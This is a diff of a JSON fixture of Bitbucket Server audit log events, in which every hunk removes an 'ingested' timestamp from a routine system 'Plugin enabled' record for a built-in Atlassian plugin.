@@ -4779,7 +4701,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867758521Z", "original": "{\"timestamp\":\"2021-11-27T17:29:31.988Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-suggestions\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-suggestions\"}]}", "type": "info", "kind": "event" 
@@ -4833,7 +4754,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867759559Z", "original": "{\"timestamp\":\"2021-11-27T17:29:31.723Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-soy-functions\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-soy-functions\"}]}", "type": "info", "kind": "event" 
@@ -4887,7 +4807,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867760598Z", "original": "{\"timestamp\":\"2021-11-27T17:29:24.643Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-sourcetree\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-sourcetree\"}]}", "type": "info", "kind": "event" 
@@ -4941,7 +4860,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867761572Z", "original": "{\"timestamp\":\"2021-11-27T17:29:24.638Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-server-web-fragments\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-server-web-fragments\"}]}", "type": "info", "kind": "event" 
@@ -4995,7 +4913,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867762484Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.479Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-search\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-search\"}]}", "type": "info", "kind": "event" @@ -5049,7 +4966,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867763462Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.434Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-sal\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-sal\"}]}", "type": "info", "kind": "event" 
@@ -5103,7 +5019,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867764417Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.432Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-rest-ui\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-rest-ui\"}]}", "type": "info", "kind": "event" 
@@ -5157,7 +5072,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867765352Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.422Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-shortcuts\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-shortcuts\"}]}", "type": "info", "kind": "event" 
@@ -5211,7 +5125,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867766309Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.406Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-management\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-management\"}]}", "type": "info", "kind": "event" 
@@ -5265,7 +5178,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867767310Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.343Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-hooks\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-hooks\"}]}", "type": "info", "kind": "event" 
@@ -5319,7 +5231,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867768246Z", "original": "{\"timestamp\":\"2021-11-27T17:29:23.039Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-ref-metadata\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-ref-metadata\"}]}", "type": "info", "kind": "event" 
@@ -5373,7 +5284,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867769224Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.847Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-rate-limit\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-rate-limit\"}]}", "type": "info", "kind": "event" 
@@ -5427,7 +5337,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867770173Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.726Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-properties\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-properties\"}]}", "type": "info", "kind": "event" 
@@ -5481,7 +5390,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867771138Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.723Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-cleanup\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-pull-request-cleanup\"}]}", "type": "info", "kind": "event" 
@@ -5535,7 +5443,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867772043Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.706Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-policies\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-policies\"}]}", "type": "info", "kind": "event" 
@@ -5589,7 +5496,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867773251Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.681Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-plugin-information-provider\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-plugin-information-provider\"}]}", "type": "info", "kind": "event" 
@@ -5643,7 +5549,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867774233Z", "original": "{\"timestamp\":\"2021-11-27T17:29:22.680Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-page-data\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-page-data\"}]}", "type": "info", "kind": "event" 
@@ -5697,7 +5602,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867775125Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.575Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-notification\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-notification\"}]}", "type": "info", "kind": "event" 
@@ -5751,7 +5655,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867776058Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.522Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-nav-links\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-nav-links\"}]}", "type": "info", "kind": "event" 
@@ -5805,7 +5708,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867776989Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.519Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-mirroring-upstream\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-mirroring-upstream\"}]}", "type": "info", "kind": "event" 
@@ -5859,7 +5761,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867778089Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.497Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-connect-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-connect-plugin\"}]}", "type": "info", "kind": "event" 
@@ -5913,7 +5814,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867779091Z", "original": "{\"timestamp\":\"2021-11-27T17:29:21.330Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.upm.atlassian-universal-plugin-manager-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.2.10\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.upm.atlassian-universal-plugin-manager-plugin\"}]}", "type": "info", "kind": "event" @@ -5967,7 +5867,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867780079Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.129Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"rome.rome-1.0\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"rome.rome-1.0\"}]}", "type": "info", "kind": "event" 
@@ -6021,7 +5920,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867781055Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.128Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bundles.json-schema-validator-atlassian-bundle\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bundles.json-schema-validator-atlassian-bundle\"}]}", "type": "info", "kind": "event" 
@@ -6075,7 +5973,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867782222Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.127Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-markup-renderers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-markup-renderers\"}]}", "type": "info", "kind": "event" 
@@ -6129,7 +6026,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867783129Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.119Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-labels\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-labels\"}]}", "type": "info", "kind": "event" 
@@ -6183,7 +6079,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867784099Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.922Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-keyboard-shortcuts\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-keyboard-shortcuts\"}]}", "type": "info", "kind": "event" 
